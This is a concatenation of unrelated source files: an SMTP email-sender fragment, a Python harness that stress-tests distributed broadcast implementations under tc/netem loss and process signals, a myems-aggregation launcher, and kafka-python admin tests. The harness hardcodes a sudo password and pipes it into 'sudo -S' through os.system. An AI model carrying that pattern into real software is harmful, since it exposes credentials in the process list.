            receiver = SETTINGS["email.receiver"]
        msg = EmailMessage()
        msg["From"] = SETTINGS["email.sender"]
        msg["To"] = receiver
        msg["Subject"] = subject
        msg.set_content(content)
        self.queue.put(msg)

    def run(self) -> None:
        """Worker loop: pop queued messages and send them over SMTP_SSL.

        The 1s queue timeout lets the loop re-check self.active so close()
        can stop the thread promptly.
        """
        while self.active:
            try:
                msg = self.queue.get(block=True, timeout=1)
                with smtplib.SMTP_SSL(
                    SETTINGS["email.server"], SETTINGS["email.port"]
                ) as smtp:
                    smtp.login(
                        SETTINGS["email.username"], SETTINGS["email.password"]
                    )
                    smtp.send_message(msg)
            except Empty:
                pass

    def start(self) -> None:
        """Mark active and start the worker thread."""
        self.active = True
        self.thread.start()

    def close(self) -> None:
        """Stop the worker thread (no-op if it was never started)."""
        if not self.active:
            return
        self.active = False
        self.thread.join()
|
validate.py | #!/usr/bin/env python3
import argparse
import os, atexit
import textwrap
import time
import tempfile
import threading, subprocess
import barrier, finishedSignal
import signal
import random
import time
from enum import Enum
from collections import defaultdict, OrderedDict
# Endpoints for the start barrier and the "finished" signal services.
BARRIER_IP = "localhost"
BARRIER_PORT = 10000
SIGNAL_IP = "localhost"
SIGNAL_PORT = 11000
# Base port for spawned processes: process i listens on PROCESSES_BASE_IP + i.
# NOTE(review): despite the name this is a port, and it equals SIGNAL_PORT —
# process 0 is never spawned, so they may not collide in practice; confirm.
PROCESSES_BASE_IP = 11000
# Do not run multiple validations concurrently!
class TC:
    """Configure Linux traffic control (tc/netem) on an interface to inject
    delay, loss and reordering; the qdisc is removed again at exit.

    losses is expected to be a dict with 2-tuples under the keys
    "delay", "loss" and "reordering" (value + variation each).
    """

    def __init__(self, losses, interface="lo", needSudo=True, sudoPassword="dcl"):
        self.losses = losses
        self.interface = interface
        self.needSudo = needSudo
        self.sudoPassword = sudoPassword
        # Add the netem qdisc (errors silenced if it already exists), then
        # change it to the requested delay/loss/reordering parameters.
        cmd1 = "tc qdisc add dev {} root netem 2>/dev/null".format(self.interface)
        cmd2 = "tc qdisc change dev {} root netem delay {} {} distribution normal loss {} {} reorder {} {}".format(
            self.interface,
            *self.losses["delay"],
            *self.losses["loss"],
            *self.losses["reordering"]
        )
        if self.needSudo:
            # NOTE(review): piping the password into `sudo -S` exposes it in
            # the process list; acceptable only for throwaway lab VMs.
            os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd1))
            os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd2))
        else:
            os.system(cmd1)
            os.system(cmd2)
        atexit.register(self.cleanup)

    def __str__(self):
        # Uniform inner indentation; textwrap.dedent strips the common prefix.
        ret = """\
        Interface: {}
        Distribution: Normal
        Delay: {} {}
        Loss: {} {}
        Reordering: {} {}""".format(
            self.interface,
            *self.losses["delay"],
            *self.losses["loss"],
            *self.losses["reordering"]
        )
        return textwrap.dedent(ret)

    def cleanup(self):
        """Remove the netem qdisc installed in __init__ (registered via atexit)."""
        cmd = "tc qdisc del dev {} root 2>/dev/null".format(self.interface)
        if self.needSudo:
            os.system("echo '{}' | sudo -S {}".format(self.sudoPassword, cmd))
        else:
            os.system(cmd)
class ProcessState(Enum):
    """Lifecycle states of a managed child process."""
    RUNNING = 1
    STOPPED = 2
    TERMINATED = 3
class ProcessInfo:
    """Bookkeeping for one spawned process: its handle, a guarding lock,
    and its current ProcessState (initially RUNNING)."""

    def __init__(self, handle):
        self.lock = threading.Lock()
        self.handle = handle
        self.state = ProcessState.RUNNING

    @staticmethod
    def stateToSignal(state):
        """Map a desired ProcessState to the POSIX signal that effects it."""
        mapping = {
            ProcessState.RUNNING: signal.SIGCONT,
            ProcessState.STOPPED: signal.SIGSTOP,
            ProcessState.TERMINATED: signal.SIGTERM,
        }
        return mapping.get(state)

    @staticmethod
    def stateToSignalStr(state):
        """Human-readable name of the signal for the given target state."""
        names = {
            ProcessState.RUNNING: "SIGCONT",
            ProcessState.STOPPED: "SIGSTOP",
            ProcessState.TERMINATED: "SIGTERM",
        }
        return names.get(state)

    @staticmethod
    def validStateTransition(current, desired):
        """True iff `current -> desired` is an allowed state change
        (TERMINATED is absorbing; RUNNING<->STOPPED; anything may terminate
        while running)."""
        allowed = {
            ProcessState.RUNNING: (ProcessState.STOPPED, ProcessState.TERMINATED),
            ProcessState.STOPPED: (ProcessState.RUNNING,),
        }
        return desired in allowed.get(current, ())
class AtomicSaturatedCounter:
    """Thread-safe counter that refuses to grow beyond a saturation limit."""

    def __init__(self, saturation, initial=0):
        self._saturation = saturation
        self._value = initial
        self._lock = threading.Lock()

    def reserve(self):
        """Atomically claim one slot; returns False once saturated."""
        with self._lock:
            if self._value >= self._saturation:
                return False
            self._value += 1
            return True
class Validation:
    """Base class for output-log validators.

    Holds the process count, the per-process message count and the
    (verified) output directory; subclasses implement config generation
    and the per-process check.
    """

    def __init__(self, processes, messages, outputDir):
        self.processes = processes
        self.messages = messages
        self.outputDirPath = os.path.abspath(outputDir)
        if not os.path.isdir(self.outputDirPath):
            raise Exception("`{}` is not a directory".format(self.outputDirPath))

    def generateConfig(self):
        """Create hosts/config files — implemented by derived classes."""
        pass

    def checkProcess(self, pid):
        """Validate one process's output — implemented by derived classes."""
        pass

    def checkAll(self, continueOnError=True):
        """Check every pid in 1..processes; optionally stop at first failure."""
        ok = True
        for pid in range(1, self.processes + 1):
            if not self.checkProcess(pid):
                ok = False
                if not continueOnError:
                    return False
        return ok
class FifoBroadcastValidation(Validation):
    """Validator for FIFO broadcast logs.

    Each proc<pid>.output file contains lines "b <seq>" (broadcast) and
    "d <sender> <seq>" (delivery); broadcasts must be sequential and
    deliveries FIFO per sender.
    """

    def generateConfig(self):
        """Write temporary hosts/config files and return their handles
        (the caller must keep the references alive — NamedTemporaryFile
        deletes the file on close/GC)."""
        hosts = tempfile.NamedTemporaryFile(mode="w")
        config = tempfile.NamedTemporaryFile(mode="w")
        for i in range(1, self.processes + 1):
            hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP + i))
        hosts.flush()
        config.write("{}\n".format(self.messages))
        config.flush()
        return (hosts, config)

    def checkProcess(self, pid):
        """Check one process's log; returns False (with a diagnostic) on the
        first FIFO or broadcast-order violation, True otherwise."""
        filePath = os.path.join(self.outputDirPath, "proc{:02d}.output".format(pid))
        i = 1  # next expected broadcast sequence number
        nextMessage = defaultdict(lambda: 1)  # per-sender next expected delivery
        filename = os.path.basename(filePath)
        with open(filePath) as f:
            # Fix: 1-based line numbers so diagnostics match editors
            # (enumerate previously started at 0).
            for lineNumber, line in enumerate(f, start=1):
                tokens = line.split()
                # Fix: tolerate blank/trailing lines instead of IndexError.
                if not tokens:
                    continue
                # Check broadcast
                if tokens[0] == "b":
                    msg = int(tokens[1])
                    if msg != i:
                        print(
                            "File {}, Line {}: Messages broadcast out of order. Expected message {} but broadcast message {}".format(
                                filename, lineNumber, i, msg
                            )
                        )
                        return False
                    i += 1
                # Check delivery
                if tokens[0] == "d":
                    sender = int(tokens[1])
                    msg = int(tokens[2])
                    if msg != nextMessage[sender]:
                        print(
                            "File {}, Line {}: Message delivered out of order. Expected message {}, but delivered message {}".format(
                                filename, lineNumber, nextMessage[sender], msg
                            )
                        )
                        return False
                    else:
                        nextMessage[sender] = msg + 1
        return True
class LCausalBroadcastValidation(Validation):
    """Validates localized-causal broadcast: deliveries of a process's
    messages must respect the causal dependencies recorded at broadcast time."""

    def __init__(self, processes, messages, outputDir, extraParameter):
        # extraParameter maps a process id -> list of processes it causally
        # depends on; processes absent from the map depend on no one.
        super().__init__(processes, messages, outputDir)
        self.dependencies = defaultdict(list, extraParameter)

    def generateConfig(self):
        """Write temporary hosts/config files for an L-causal run.

        The config's first line is the message count; each following line is
        `<process> <dependency>...`. Returns (hosts, config) NamedTemporaryFile
        handles — keep them alive as long as the files are needed.
        """
        hosts = tempfile.NamedTemporaryFile(mode="w")
        config = tempfile.NamedTemporaryFile(mode="w")
        # Write hosts file
        for i in range(1, self.processes + 1):
            hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP + i))
        hosts.flush()
        # Write config file
        config.write("{}\n".format(self.messages))
        for process in range(1, self.processes + 1):
            l = [process] + self.dependencies[process]
            config.write("{}\n".format(" ".join(map(str, l))))
        config.flush()
        return (hosts, config)

    def checkProcess(self, pid):
        """Check that every OTHER process delivered pid's messages only after
        delivering everything those messages causally depend on.

        Returns False as soon as a violation (or an invalid broadcaster log)
        is found, True otherwise.
        """
        # deps[msg] is the vector clock pid had when it broadcast msg,
        # or False if pid's own log already failed validation.
        deps = self.createMessageDependencies(pid)
        if deps is False:
            return False
        for process in range(1, self.processes + 1):
            if process == pid:
                continue
            filePath = os.path.join(
                self.outputDirPath, "proc{:02d}.output".format(process)
            )
            # received[p] = highest message number delivered from p so far.
            received = defaultdict(lambda: 0)
            filename = os.path.basename(filePath)
            with open(filePath) as f:
                # NOTE(review): lineNumber is 0-based in the message below.
                for lineNumber, line in enumerate(f):
                    tokens = line.split()
                    if tokens[0] == "d":
                        sender = int(tokens[1])
                        msg = int(tokens[2])
                        if sender == pid:
                            # Every dependency recorded at broadcast time must
                            # already have been delivered by this process.
                            for (p, num) in deps[msg].items():
                                if num > received[p]:
                                    print(
                                        "File {}, Line {}: Causal ordering of process {} not respected. Expected message {} from {} but last message got was {}".format(
                                            filename,
                                            lineNumber,
                                            pid,
                                            num,
                                            p,
                                            received[p],
                                        )
                                    )
                                    return False
                        received[sender] = msg
        return True

    def createMessageDependencies(self, pid):
        """Replay pid's own log, checking FIFO order, and record the vector
        clock at each broadcast. Returns {msg: vectorClock} or False on error."""
        filePath = os.path.join(self.outputDirPath, "proc{:02d}.output".format(pid))
        i = 1
        nextMessage = defaultdict(lambda: 1)
        filename = os.path.basename(filePath)
        messageDeps = dict()
        # vectorClock[p] = last message delivered from dependency p.
        vectorClock = dict()
        myDependencies = self.dependencies[pid]
        with open(filePath) as f:
            for lineNumber, line in enumerate(f):
                tokens = line.split()
                # Check broadcast
                if tokens[0] == "b":
                    msg = int(tokens[1])
                    if msg != i:
                        print(
                            "File {}, Line {}: Messages broadcast out of order. Expected message {} but broadcast message {}".format(
                                filename, lineNumber, i, msg
                            )
                        )
                        return False
                    # Snapshot the causal past of this broadcast.
                    messageDeps[msg] = vectorClock.copy()
                    i += 1
                # Check delivery
                if tokens[0] == "d":
                    sender = int(tokens[1])
                    msg = int(tokens[2])
                    if msg != nextMessage[sender]:
                        print(
                            "File {}, Line {}: Message delivered out of order. Expected message {}, but delivered message {}".format(
                                filename, lineNumber, nextMessage[sender], msg
                            )
                        )
                        return False
                    nextMessage[sender] += 1
                    # Only deliveries from declared dependencies advance the clock.
                    if sender in myDependencies:
                        vectorClock[sender] = msg
        return messageDeps
class StressTest:
    """Randomly stops, resumes and terminates the launched processes from one
    or more threads, simulating crashes and slow processes."""

    def __init__(self, procs, concurrency, attempts, attemptsRatio):
        # procs: list of (logicalPID, process handle) pairs.
        # concurrency: number of interfering threads run() will spawn.
        # attempts: successful signal deliveries each thread performs.
        # attemptsRatio: dict with "STOP"/"CONT"/"TERM" probabilities.
        self.processes = len(procs)
        self.processesInfo = dict()
        for (logicalPID, handle) in procs:
            self.processesInfo[logicalPID] = ProcessInfo(handle)
        self.concurrency = concurrency
        self.attempts = attempts
        self.attemptsRatio = attemptsRatio
        # Cap terminations to a strict minority so a majority stays alive.
        maxTerminatedProcesses = (
            self.processes // 2
            if self.processes % 2 == 1
            else (self.processes - 1) // 2
        )
        self.terminatedProcs = AtomicSaturatedCounter(maxTerminatedProcesses)

    def stress(self):
        """Worker loop: pick a random process and operation and apply it when
        the state transition is valid, until `attempts` signals have landed."""
        selectProc = list(range(1, self.processes + 1))
        random.shuffle(selectProc)
        # Weighted operation pool: 1000 slots split per attemptsRatio.
        selectOp = (
            [ProcessState.STOPPED] * int(1000 * self.attemptsRatio["STOP"])
            + [ProcessState.RUNNING] * int(1000 * self.attemptsRatio["CONT"])
            + [ProcessState.TERMINATED] * int(1000 * self.attemptsRatio["TERM"])
        )
        random.shuffle(selectOp)
        successfulAttempts = 0
        while successfulAttempts < self.attempts:
            proc = random.choice(selectProc)
            op = random.choice(selectOp)
            info = self.processesInfo[proc]
            with info.lock:
                if ProcessInfo.validStateTransition(info.state, op):
                    if op == ProcessState.TERMINATED:
                        # Terminate only while the saturated counter has room;
                        # once reserved, never pick this process again.
                        reserved = self.terminatedProcs.reserve()
                        if reserved:
                            selectProc.remove(proc)
                        else:
                            continue
                    # NOTE(review): sleeping while holding info.lock serializes
                    # other workers touching this process — presumably intended
                    # to space signals out; confirm.
                    time.sleep(float(random.randint(50, 500)) / 1000.0)
                    info.handle.send_signal(ProcessInfo.stateToSignal(op))
                    info.state = op
                    successfulAttempts += 1
                    print(
                        "Sending {} to process {}".format(
                            ProcessInfo.stateToSignalStr(op), proc
                        )
                    )
            # if op == ProcessState.TERMINATED and proc not in terminatedProcs:
            # if len(terminatedProcs) < maxTerminatedProcesses:
            # terminatedProcs.add(proc)
            # if len(terminatedProcs) == maxTerminatedProcesses:
            # break

    def remainingUnterminatedProcesses(self):
        """Return the logical PIDs not yet terminated, or None if none remain."""
        remaining = []
        for pid, info in self.processesInfo.items():
            with info.lock:
                if info.state != ProcessState.TERMINATED:
                    remaining.append(pid)
        return None if len(remaining) == 0 else remaining

    def terminateAllProcesses(self):
        """Terminate every live process, resuming stopped ones first so the
        termination signal can take effect."""
        for _, info in self.processesInfo.items():
            with info.lock:
                if info.state != ProcessState.TERMINATED:
                    if info.state == ProcessState.STOPPED:
                        info.handle.send_signal(
                            ProcessInfo.stateToSignal(ProcessState.RUNNING)
                        )
                    info.handle.send_signal(
                        ProcessInfo.stateToSignal(ProcessState.TERMINATED)
                    )
        return False

    def continueStoppedProcesses(self):
        """Resume every process that is currently stopped."""
        for _, info in self.processesInfo.items():
            with info.lock:
                if info.state != ProcessState.TERMINATED:
                    if info.state == ProcessState.STOPPED:
                        info.handle.send_signal(
                            ProcessInfo.stateToSignal(ProcessState.RUNNING)
                        )

    def run(self):
        """Run stress() on `concurrency` threads, or inline when concurrency <= 1."""
        if self.concurrency > 1:
            threads = [
                threading.Thread(target=self.stress) for _ in range(self.concurrency)
            ]
            [p.start() for p in threads]
            [p.join() for p in threads]
        else:
            self.stress()
def startProcesses(processes, runscript, hostsFilePath, configFilePath, outputDir):
    """Launch `processes` instances of the da_proc binary (C++ or Java jar).

    Each process gets its own --id / --output arguments and per-process
    stdout/stderr log files inside `outputDir`.

    Returns:
        list of (logicalPID, subprocess.Popen) tuples.

    Raises:
        Exception: if the runscript path or output directory is invalid, or
            no built binary can be found next to the runscript.
    """
    runscriptPath = os.path.abspath(runscript)
    if not os.path.isfile(runscriptPath):
        raise Exception("`{}` is not a file".format(runscriptPath))
    if os.path.basename(runscriptPath) != "run.sh":
        raise Exception("`{}` is not a runscript".format(runscriptPath))
    outputDirPath = os.path.abspath(outputDir)
    if not os.path.isdir(outputDirPath):
        raise Exception("`{}` is not a directory".format(outputDirPath))
    baseDir, _ = os.path.split(runscriptPath)
    bin_cpp = os.path.join(baseDir, "bin", "da_proc")
    bin_java = os.path.join(baseDir, "bin", "da_proc.jar")
    # Prefer the native binary; fall back to the jar.
    if os.path.exists(bin_cpp):
        cmd = [bin_cpp]
    elif os.path.exists(bin_java):
        cmd = ["java", "-jar", bin_java]
    else:
        raise Exception(
            "`{}` could not find a binary to execute. Make sure you build before validating".format(
                runscriptPath
            )
        )
    procs = []
    for pid in range(1, processes + 1):
        cmd_ext = [
            "--id",
            str(pid),
            "--hosts",
            hostsFilePath,
            "--barrier",
            "{}:{}".format(BARRIER_IP, BARRIER_PORT),
            "--signal",
            "{}:{}".format(SIGNAL_IP, SIGNAL_PORT),
            "--output",
            os.path.join(outputDirPath, "proc{:02d}.output".format(pid)),
            configFilePath,
        ]
        # BUGFIX: close the parent's copies of the log file objects once the
        # child has inherited them (Popen dups the descriptors); previously
        # two file descriptors leaked per launched process.
        with open(
            os.path.join(outputDirPath, "proc{:02d}.stdout".format(pid)), "w"
        ) as stdoutFd, open(
            os.path.join(outputDirPath, "proc{:02d}.stderr".format(pid)), "w"
        ) as stderrFd:
            procs.append(
                (pid, subprocess.Popen(cmd + cmd_ext, stdout=stdoutFd, stderr=stderrFd))
            )
    return procs
def main(processes, messages, runscript, broadcastType, logsDir, testConfig):
    """Run one full validation round.

    Configures traffic control, starts the init-barrier and finish-signal
    servers, launches the broadcasting processes, stresses them with random
    STOP/CONT/TERM signals, then validates every process's output file.

    Args:
        processes: number of broadcasting processes to launch.
        messages: messages each process should broadcast.
        runscript: path to the project's run.sh (locates the binary).
        broadcastType: "fifo" or "lcausal".
        logsDir: directory receiving stdout/stderr/output files.
        testConfig: dict with "TC" (network shaping) and "ST" (stress) sections.
    """
    # Set tc for loopback
    tc = TC(testConfig["TC"])
    print(tc)
    # Start the barrier
    initBarrier = barrier.Barrier(BARRIER_IP, BARRIER_PORT, processes)
    initBarrier.listen()
    startTimesFuture = initBarrier.startTimesFuture()
    initBarrierThread = threading.Thread(target=initBarrier.wait)
    initBarrierThread.start()
    # Start the finish signal
    finishSignal = finishedSignal.FinishedSignal(SIGNAL_IP, SIGNAL_PORT, processes)
    finishSignal.listen()
    finishSignalThread = threading.Thread(target=finishSignal.wait)
    finishSignalThread.start()
    # Causal dependencies; only used by the lcausal validation.
    dependencies = {
        1: [2, 4],
        2: [3],
        5: [1],
    }
    if broadcastType == "fifo":
        validation = FifoBroadcastValidation(processes, messages, logsDir)
    else:
        validation = LCausalBroadcastValidation(
            processes, messages, logsDir, dependencies
        )
    hostsFile, configFile = validation.generateConfig()
    # BUGFIX: bind procs before the try block; if startProcesses() raised, the
    # finally clause used to fail with UnboundLocalError on `procs`.
    procs = None
    try:
        # Start the processes and get their PIDs
        procs = startProcesses(
            processes, runscript, hostsFile.name, configFile.name, logsDir
        )
        # Create the stress test
        st = StressTest(
            procs,
            testConfig["ST"]["concurrency"],
            testConfig["ST"]["attempts"],
            testConfig["ST"]["attemptsDistribution"],
        )
        for (logicalPID, procHandle) in procs:
            print(
                "Process with logicalPID {} has PID {}".format(
                    logicalPID, procHandle.pid
                )
            )
        initBarrierThread.join()
        print("All processes have been initialized.")
        st.run()
        print("StressTest is complete.")
        print("Resuming stopped processes.")
        st.continueStoppedProcesses()
        print("Waiting until all running processes have finished broadcasting.")
        finishSignalThread.join()
        for pid, startTs in OrderedDict(sorted(startTimesFuture.items())).items():
            print(
                "Process {} finished broadcasting {} messages in {} ms".format(
                    pid, messages, finishSignal.endTimestamps()[pid] - startTs
                )
            )
        unterminated = st.remainingUnterminatedProcesses()
        if unterminated is not None:
            input(
                "Hit `Enter` to terminate the remaining processes with logicalPIDs {}.".format(
                    unterminated
                )
            )
            st.terminateAllProcesses()
        mutex = threading.Lock()
        def waitForProcess(logicalPID, procHandle, mutex):
            # Serialize prints from the concurrent monitor threads.
            procHandle.wait()
            with mutex:
                print(
                    "Process {} exited with {}".format(
                        logicalPID, procHandle.returncode
                    )
                )
        # Monitor which processes have exited
        monitors = [
            threading.Thread(
                target=waitForProcess, args=(logicalPID, procHandle, mutex)
            )
            for (logicalPID, procHandle) in procs
        ]
        [p.start() for p in monitors]
        [p.join() for p in monitors]
        input("Hit `Enter` to validate the output")
        print("Result of validation: {}".format(validation.checkAll()))
    finally:
        # Best-effort cleanup: kill whatever was actually started.
        if procs is not None:
            for _, p in procs:
                p.kill()
if __name__ == "__main__":
    # CLI entry point: parse arguments, build the test configuration and run.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-r",
        "--runscript",
        required=True,
        dest="runscript",
        help="Path to run.sh",
    )
    parser.add_argument(
        "-b",
        "--broadcast",
        choices=["fifo", "lcausal"],
        required=True,
        dest="broadcastType",
        help="Which broadcast implementation to test",
    )
    parser.add_argument(
        "-l",
        "--logs",
        required=True,
        dest="logsDir",
        help="Directory to store stdout, stderr and outputs generated by the processes",
    )
    parser.add_argument(
        "-p",
        "--processes",
        required=True,
        type=int,
        dest="processes",
        help="Number of processes that broadcast",
    )
    parser.add_argument(
        "-m",
        "--messages",
        required=True,
        type=int,
        dest="messages",
        help="Maximum number (because it can crash) of messages that each process can broadcast",
    )
    results = parser.parse_args()
    testConfig = {
        # Network configuration using the tc command
        "TC": {
            "delay": ("200ms", "50ms"),
            "loss": ("10%", "25%"),
            "reordering": ("25%", "50%"),
        },
        # StressTest configuration
        "ST": {
            "concurrency": 8,  # How many threads are interferring with the running processes
            "attempts": 8,  # How many interferring attempts each threads does
            "attemptsDistribution": {  # Probability with which an interferring thread will
                "STOP": 0.48,  # select an interferring action (make sure they add up to 1)
                "CONT": 0.48,
                "TERM": 0.04,
            },
        },
    }
    main(
        results.processes,
        results.messages,
        results.runscript,
        results.broadcastType,
        results.logsDir,
        testConfig,
    )
|
main.py | import logging
from logging.handlers import RotatingFileHandler
from multiprocessing import Process
import combined_equipment_energy_input_category
import combined_equipment_energy_input_item
import combined_equipment_energy_output_category
import combined_equipment_billing_input_category
import combined_equipment_billing_input_item
import combined_equipment_billing_output_category
import equipment_energy_input_category
import equipment_energy_input_item
import equipment_energy_output_category
import equipment_billing_input_category
import equipment_billing_input_item
import equipment_billing_output_category
import meter_carbon
import meter_billing
import offline_meter_carbon
import offline_meter_billing
import shopfloor_billing_input_category
import shopfloor_billing_input_item
import shopfloor_energy_input_category
import shopfloor_energy_input_item
import space_billing_input_category
import space_billing_input_item
import space_billing_output_category
import space_energy_input_category
import space_energy_input_item
import space_energy_output_category
import store_billing_input_category
import store_billing_input_item
import store_energy_input_category
import store_energy_input_item
import tenant_billing_input_category
import tenant_billing_input_item
import tenant_energy_input_category
import tenant_energy_input_item
import virtual_meter_carbon
import virtual_meter_billing
def main():
    """Configure logging and spawn one worker process per aggregation task."""
    # create logger
    logger = logging.getLogger('myems-aggregation')
    # Only ERROR and CRITICAL records are handled; lower severities are ignored.
    logger.setLevel(logging.ERROR)
    # Log to a rotating file and to sys.stderr with the same formatter.
    fh = RotatingFileHandler('myems-aggregation.log', maxBytes=1024*1024, backupCount=1)
    fh.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
    logger.addHandler(fh)
    logger.addHandler(logging.StreamHandler())
    # Each aggregation procedure runs in its own process, sharing the logger.
    # Order matters only in that it mirrors the original start-up sequence.
    workers = (
        combined_equipment_energy_input_category,
        combined_equipment_energy_input_item,
        combined_equipment_energy_output_category,
        combined_equipment_billing_input_category,
        combined_equipment_billing_input_item,
        combined_equipment_billing_output_category,
        equipment_billing_input_category,
        equipment_billing_input_item,
        equipment_billing_output_category,
        equipment_energy_input_category,
        equipment_energy_input_item,
        equipment_energy_output_category,
        meter_carbon,
        meter_billing,
        offline_meter_carbon,
        offline_meter_billing,
        shopfloor_billing_input_category,
        shopfloor_billing_input_item,
        shopfloor_energy_input_category,
        shopfloor_energy_input_item,
        space_billing_input_category,
        space_billing_input_item,
        space_billing_output_category,
        space_energy_input_category,
        space_energy_input_item,
        space_energy_output_category,
        store_billing_input_category,
        store_billing_input_item,
        store_energy_input_category,
        store_energy_input_item,
        tenant_billing_input_category,
        tenant_billing_input_item,
        tenant_energy_input_category,
        tenant_energy_input_item,
        virtual_meter_carbon,
        virtual_meter_billing,
    )
    for worker in workers:
        Process(target=worker.main, args=(logger,)).start()
# Script entry point: spawn all aggregation worker processes.
if __name__ == '__main__':
    main()
|
test_admin_integration.py | import pytest
from logging import info
from test.testutil import env_kafka_version, random_string
from threading import Event, Thread
from time import time, sleep
from kafka.admin import (
ACLFilter, ACLOperation, ACLPermissionType, ResourcePattern, ResourceType, ACL, ConfigResource, ConfigResourceType)
from kafka.errors import (NoError, GroupCoordinatorNotAvailableError, NonEmptyGroupError, GroupIdNotFoundError)
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="ACL features require broker >=0.11")
def test_create_describe_delete_acls(kafka_admin_client):
    """Tests that we can add, list and remove ACLs
    """
    # Filter matching ACLs for ANY principal/operation/permission on "topic".
    # principal=None means "match any principal" in an ACL filter.
    any_topic_acl_filter = ACLFilter(
        principal=None,
        host="*",
        operation=ACLOperation.ANY,
        permission_type=ACLPermissionType.ANY,
        resource_pattern=ResourcePattern(ResourceType.TOPIC, "topic")
    )
    # Check that we don't have any ACLs in the cluster
    acls, error = kafka_admin_client.describe_acls(any_topic_acl_filter)
    assert error is NoError
    assert len(acls) == 0
    # Try to add an ACL
    acl = ACL(
        principal="User:test",
        host="*",
        operation=ACLOperation.READ,
        permission_type=ACLPermissionType.ALLOW,
        resource_pattern=ResourcePattern(ResourceType.TOPIC, "topic")
    )
    result = kafka_admin_client.create_acls([acl])
    assert len(result["failed"]) == 0
    assert len(result["succeeded"]) == 1
    # Check that we can list the ACL we created
    acls, error = kafka_admin_client.describe_acls(any_topic_acl_filter)
    assert error is NoError
    assert len(acls) == 1
    # Remove the ACL
    delete_results = kafka_admin_client.delete_acls(
        [
            ACLFilter(
                principal="User:test",
                host="*",
                operation=ACLOperation.READ,
                permission_type=ACLPermissionType.ALLOW,
                resource_pattern=ResourcePattern(ResourceType.TOPIC, "topic")
            )
        ]
    )
    assert len(delete_results) == 1
    assert len(delete_results[0][1]) == 1  # Check number of affected ACLs
    # Make sure the ACL does not exist in the cluster anymore.
    # BUGFIX: the final check previously filtered with principal="*", which
    # only matches ACLs whose principal is literally "*" — so a failed
    # deletion of the "User:test" ACL would have gone undetected. Use the
    # same match-any filter (principal=None) as the initial check.
    acls, error = kafka_admin_client.describe_acls(any_topic_acl_filter)
    assert error is NoError
    assert len(acls) == 0
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="Describe config features require broker >=0.11")
def test_describe_configs_broker_resource_returns_configs(kafka_admin_client):
    """Tests that describe config returns configs for broker
    """
    broker_id = kafka_admin_client._client.cluster._brokers[0].nodeId
    configs = kafka_admin_client.describe_configs(
        [ConfigResource(ConfigResourceType.BROKER, broker_id)])
    assert len(configs) == 1
    described = configs[0].resources[0]
    # indexes 2/3 hold the resource type and name; 4 holds the config entries
    assert described[2] == ConfigResourceType.BROKER
    assert described[3] == str(broker_id)
    assert len(described[4]) > 1
@pytest.mark.xfail(condition=True,
                   reason="https://github.com/dpkp/kafka-python/issues/1929",
                   raises=AssertionError)
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="Describe config features require broker >=0.11")
def test_describe_configs_topic_resource_returns_configs(topic, kafka_admin_client):
    """Tests that describe config returns configs for topic
    """
    configs = kafka_admin_client.describe_configs(
        [ConfigResource(ConfigResourceType.TOPIC, topic)])
    assert len(configs) == 1
    described = configs[0].resources[0]
    # indexes 2/3 hold the resource type and name; 4 holds the config entries
    assert described[2] == ConfigResourceType.TOPIC
    assert described[3] == topic
    assert len(described[4]) > 1
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="Describe config features require broker >=0.11")
def test_describe_configs_mixed_resources_returns_configs(topic, kafka_admin_client):
    """Tests that describe config returns configs for mixed resource types (topic + broker)
    """
    broker_id = kafka_admin_client._client.cluster._brokers[0].nodeId
    configs = kafka_admin_client.describe_configs([
        ConfigResource(ConfigResourceType.TOPIC, topic),
        ConfigResource(ConfigResourceType.BROKER, broker_id)])
    assert len(configs) == 2
    # Each response must describe exactly one of the two requested resources.
    expected = {
        (ConfigResourceType.TOPIC, topic),
        (ConfigResourceType.BROKER, str(broker_id)),
    }
    for config in configs:
        described = config.resources[0]
        assert (described[2], described[3]) in expected
        assert len(described[4]) > 1
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="Describe config features require broker >=0.11")
def test_describe_configs_invalid_broker_id_raises(kafka_admin_client):
    """Tests that describe config raises exception on non-integer broker id
    """
    broker_id = "str"
    with pytest.raises(ValueError):
        # The return value is irrelevant here; binding it to an unused local
        # (as before) just triggered lint warnings (F841).
        kafka_admin_client.describe_configs([ConfigResource(ConfigResourceType.BROKER, broker_id)])
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason='Describe consumer group requires broker >=0.11')
def test_describe_consumer_group_does_not_exist(kafka_admin_client):
    """Tests that the describe consumer group call fails if the group coordinator is not available
    """
    with pytest.raises(GroupCoordinatorNotAvailableError):
        # The return value is irrelevant; the unused `group_description`
        # local was removed (F841).
        kafka_admin_client.describe_consumer_groups(['test'])
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason='Describe consumer group requires broker >=0.11')
def test_describe_consumer_group_exists(kafka_admin_client, kafka_consumer_factory, topic):
    """Tests that the describe consumer group call returns valid consumer group information
    This test takes inspiration from the test 'test_group' in test_consumer_group.py.
    """
    consumers = {}
    stop = {}
    threads = {}
    random_group_id = 'test-group-' + random_string(6)
    # Two groups; consumers below are assigned round-robin, so with three
    # consumers group 1 ends up with two members and group 2 with one.
    group_id_list = [random_group_id, random_group_id + '_2']
    generations = {group_id_list[0]: set(), group_id_list[1]: set()}
    def consumer_thread(i, group_id):
        # Poll until told to stop, then close and clear the shared slots.
        assert i not in consumers
        assert i not in stop
        stop[i] = Event()
        consumers[i] = kafka_consumer_factory(group_id=group_id)
        while not stop[i].is_set():
            consumers[i].poll(20)
        consumers[i].close()
        consumers[i] = None
        stop[i] = None
    num_consumers = 3
    for i in range(num_consumers):
        group_id = group_id_list[i % 2]
        t = Thread(target=consumer_thread, args=(i, group_id,))
        t.start()
        threads[i] = t
    try:
        timeout = time() + 35
        while True:
            for c in range(num_consumers):
                # Verify all consumers have been created
                if c not in consumers:
                    break
                # Verify all consumers have an assignment
                elif not consumers[c].assignment():
                    break
            # If all consumers exist and have an assignment
            else:
                info('All consumers have assignment... checking for stable group')
                # Verify all consumers are in the same generation
                # then log state and break while loop
                for consumer in consumers.values():
                    generations[consumer.config['group_id']].add(consumer._coordinator._generation.generation_id)
